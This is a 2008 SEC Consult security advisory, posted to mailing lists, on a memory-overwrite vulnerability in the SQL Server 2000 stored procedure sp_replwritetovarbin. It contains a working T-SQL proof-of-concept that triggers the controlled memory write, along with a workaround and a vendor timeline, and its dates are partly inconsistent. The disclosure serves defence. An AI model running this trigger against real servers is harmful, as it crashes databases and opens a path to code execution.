Subject: SEC Consult SA-20081109-0 :: Microsoft SQL Server 2000
sp_replwritetovarbin limited memory overwrite vulnerability
From: Bernhard Mueller <research@sec-consult.com.>
To: Full Disclosure <full-disclosure@lists.grok.org.uk.>,
Bugtraq <bugtraq@securityfocus.com.>
X-MS-Has-Attach:
X-MS-TNEF-Correlator:
Content-Type: text/plain
Date: Tue, 9 Dec 2008 13:16:34 +0100
Message-ID: <1228824994.7036.8.camel@b4byl0n.>
MIME-Version: 1.0
X-Mailer: Evolution 2.22.3.1
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: antivirus-gw at tyumen.ru
SEC Consult Security Advisory < 20081209-0 >
title: Microsoft SQL Server 2000 sp_replwritetovarbin
limited memory overwrite vulnerability
program: Microsoft SQL Server 2000
vulnerable version: <=8.00.2039
homepage: www.microsoft.com
found: 04-12-2008
by: Bernhard Mueller (SEC Consult Vulnerability
Lab)
perm. link:
http://www.sec-consult.com/files/20081209_mssql-2000-sp_replwritetovarbin_memwrite.txt
Product description:
Microsoft SQL Server is a relational database management system (RDBMS)
produced by Microsoft. Its primary query language is Transact-SQL, an
implementation of the ANSI/ISO standard Structured Query Language (SQL)
used by both Microsoft and Sybase.
Vulnerabilty overview:
By calling the extended stored procedure sp_replwritetovarbin, and
supplying several uninitialized variables as parameters, it is possible
to trigger a memory write to a controlled location. Depending on the
underlying Windows version, it is / may be possible to use this
vulnerability to execute arbitrary code in the context of the vulnerable
SQL server process.
In a default configuration, the sp_replwritetovarbin stored procedure is
accessible by anyone. The vulnerability can be exploited by an
authenticated user with a direct database connection, or via SQL
injection in a vulnerable web application.
Vulnerability details:
The following T-SQL script can be used to test for the vulnerability:
--------------------------------
DECLARE @buf NVARCHAR(4000),
@val NVARCHAR(4),
@counter INT
SET @buf = '
declare @retcode int,
@end_offset int,
@vb_buffer varbinary,
@vb_bufferlen int,
@buf nvarchar;
exec master.dbo.sp_replwritetovarbin 1,
@end_offset output,
@vb_buffer output,
@vb_bufferlen output,'''
SET @val = CHAR(0x41)
SET @counter = 0
WHILE @counter < 3000
BEGIN
SET @counter = @counter + 1
SET @buf = @buf + @val
END
SET @buf = @buf + ''',''1'',''1'',''1'',
''1'',''1'',''1'',''1'',''1'',''1'''
EXEC master..sp_executesql @buf
--------------------------------
This triggers an access violation exception (write to address
0x41414141).
The vulnerability has been successfully used to execute arbitrary code
on a lab machine.
SEC Consult will not release code execution exploits for this
vulnerability to the public.
Workaround:
Remove the sp_replwriterovarbin extended stored procedure. Run the
following as an administrator:
execute dbo.sp_dropextendedproc 'sp_replwritetovarbin'
See also:
"Removing an Extended Stored Procedure from SQL Server"
http://msdn.microsoft.com/en-us/library/aa215995(SQL.80).aspx
Patch:
According to an email received by Microsoft in September, a fix for this
vulnerability has been completed.
The release schedule for this fix is currently unknown.
Vendor timeline:
---------------
Vendor notified: 2008-04-17
Vendor response: 2008-04-17
Last response from Microsoft: 09-29-2008
Request for update status 1: 10-14-2008
Request for update status 2: 10-29-2008
Request for update status 3: 11-12-2008
Request for update status 4
and prenotification about advisory release date: 11-28-2008
Public release: 11-09-2008
--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH
Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria
Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com
EOF Bernhard Mueller / @2008
